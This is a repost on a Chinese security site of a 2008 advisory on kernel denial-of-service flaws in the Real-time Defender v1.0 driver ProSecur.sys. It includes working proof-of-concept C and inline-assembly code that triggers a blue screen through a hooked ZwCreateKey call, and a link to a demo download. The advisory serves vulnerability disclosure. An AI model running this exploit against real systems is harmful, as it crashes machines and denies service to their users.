黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Real-Time Defender v1.0 多处内核拒绝服务漏洞

2008-10-9 10:09| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。 RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引...
Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。 RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引发蓝屏。 出问题的组件:ProSecur.sys ,版本:1.1.1.0,CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8 该问题同之前Malware defender的问题类似(http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html)RTD在很多SSDT HOOK函数中,对参数检查不够严格,就将参数传递给系统的 ZwXxx函数,结果引发蓝屏。 示例函数:hk_ZwCreateKey 偏移:0x21f56 测试代码: WCHAR xx[] = L"xxxx_fuck_rtd"; HMODULE hlib = LoadLibrary("ntdll.dll");PVOID p = GetProcAddress(hlib , "ZwCreateKey"); OBJECT_ATTRIBUTES oba ;UNICODE_STRING strname ;strname.Buffer = xx;strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ; InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000); __asm{ push 0push 0push 0push 0lea eax,obapush eaxpush 0push 0call p } return ; 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下BSOD_rtd.rar

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部